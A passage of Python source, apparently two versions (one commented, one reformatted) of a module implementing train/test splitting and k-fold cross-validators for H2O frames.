subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n\n cv = CVClass(n_splits=2,\n test_size=test_size,\n train_size=train_size,\n random_state=random_state)\n\n # for the h2o one, we only need iter 0\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n\n # h2o \"doesn't reorder rows\" so we need to keep these sorted...\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = (\n frame[train, :],\n frame[test, :]\n )\n\n return out\n\n\n# Avoid a pb with nosetests...\nh2o_train_test_split.__test__ = False\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n\n # h2o can't handle anything but lists...\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError('this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.:\n raise ValueError(\n 'test_size=%f should be smaller '\n 'than 1.0 or be an integer' % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.:\n raise ValueError(\n 'train_size=%f should be smaller '\n 'than 1.0 or be an integer' % test_size)\n elif (np.asarray(test_size).dtype.kind == 'f' and\n (train_size + test_size) > 1.):\n raise ValueError('The sum of test_size and train_size = %f'\n 'should be smaller than 1.0. Reduce test_size '\n 'and/or train_size.' % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError('test_size=%d should be smaller '\n 'than the number of samples %d' % (test_size, n_samples))\n\n if train_size is not None and np.asarray(train_size).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError('train_size=%d should be smaller '\n 'than the number of samples %d' % (train_size, n_samples))\n\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n\n if test_size is None:\n n_test = n_samples - n_train\n\n if n_train + n_test > n_samples:\n raise ValueError('The sum of train_size and test_size=%d, '\n 'should be smaller than the number of '\n 'samples %d. Reduce test_size and/or '\n 'train_size.' % (n_train + n_test, n_samples))\n\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None, random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size)\n\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:(n_test + n_train)]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples,\n self.test_size, self.train_size)\n\n # need to validate y...\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist())\n\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError('The least populated class in y has only 1 '\n 'member, which is too few. The minimum number of labels '\n 'for any class cannot be less than 2.')\n\n if n_train < n_classes:\n raise ValueError('The train_size=%d should be greater than or '\n 'equal to the number of classes=%d' % (n_train, n_classes))\n\n if n_test < n_classes:\n raise ValueError('The test_size=%d should be greater than or '\n 'equal to the number of classes=%d' % (n_test, n_classes))\n\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int))\n\n for _ in range(self.n_splits):\n train = []\n test = []\n\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where((target == class_i))[0][permutation]\n\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n\n # Might end up here with less samples in train and test than we asked\n # for, due to rounding errors.\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength=len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n\n train = rng.permutation(train)\n test = rng.permutation(test)\n\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError('n_folds must be of Integral type. '\n '%s of type %s was passed' % (n_folds, type(n_folds)))\n\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError('k-fold cross-validation requires at least one '\n 'train/test split by setting n_folds=2 or more')\n\n if shuffle not in [True, False]:\n raise TypeError('shuffle must be True or False. Got %s (type=%s)'\n % (str(shuffle), type(shuffle)))\n\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n\n n_folds = self.n_folds\n fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state)\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n\n # validate that it's a string\n y = _val_y(y) # gets a string back or None\n if y is None:\n raise ValueError('H2OStratifiedKFold requires a target name (got None)')\n\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n\n if np.all(self.n_folds > y_counts):\n raise ValueError(('All the n_labels for individual classes'\n ' are less than %d folds.'\n % self.n_folds), Warning)\n if self.n_folds > min_labels:\n warnings.warn(('The least populated class in y has only %d'\n ' members, which is too few. The minimum'\n ' number of labels for any class cannot'\n ' be less than n_folds=%d.'\n % (min_labels, self.n_folds)), Warning)\n\n # NOTE FROM SKLEARN:\n\n # pre-assign each sample to a test fold index using individual KFold\n # splitting strategies for each class so as to respect the balance of\n # classes\n # NOTE: Passing the data corresponding to ith class say X[y==class_i]\n # will break when the data is not 100% stratifiable for all classes.\n # So we pass np.zeroes(max(c, n_folds)) as data to the KFold.\n\n # Remember, however that we might be using the old-fold KFold which doesn't\n # have a split method...\n if SK18:\n per_cls_cvs = [\n KFold(self.n_folds, # using sklearn's KFold here\n shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds)))\n for count in y_counts\n ]\n else:\n per_cls_cvs = [\n KFold(max(count, self.n_folds), # using sklearn's KFold here\n self.n_folds,\n shuffle=self.shuffle,\n random_state=rng)\n for count in y_counts\n ]\n\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n\n # the test split can be too big because we used\n # KFold(...).split(X[:max(c, n_folds)]) when data is not 100%\n # stratifiable for all the classes\n # (we use a warning instead of raising an exception)\n # If this is the case, let's trim it:\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n\n return test_folds\n", "from __future__ import division, print_function, absolute_import\nimport numbers\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nimport numpy as np\nfrom .base import check_frame\nfrom skutil.base import overrides\nfrom sklearn.externals import six\nfrom sklearn.base import _pprint\nfrom sklearn.utils.fixes import signature, bincount\nfrom sklearn.utils import check_random_state\nfrom math import ceil, floor\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n__all__ = ['check_cv', 'h2o_train_test_split', 'H2OKFold',\n 'H2OShuffleSplit', 'H2OStratifiedKFold', 'H2OStratifiedShuffleSplit']\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\nh2o_train_test_split.__test__ = False\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.0:\n raise ValueError(\n 'test_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.0:\n raise ValueError(\n 'train_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size\n ).dtype.kind == 'f' and train_size + test_size > 1.0:\n raise ValueError(\n 'The sum of test_size and train_size = %fshould be smaller than 1.0. Reduce test_size and/or train_size.'\n % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in 